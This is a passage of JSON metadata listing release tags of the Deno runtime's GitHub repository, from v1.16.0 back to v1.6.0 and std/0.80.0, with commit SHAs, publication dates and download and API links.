":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifes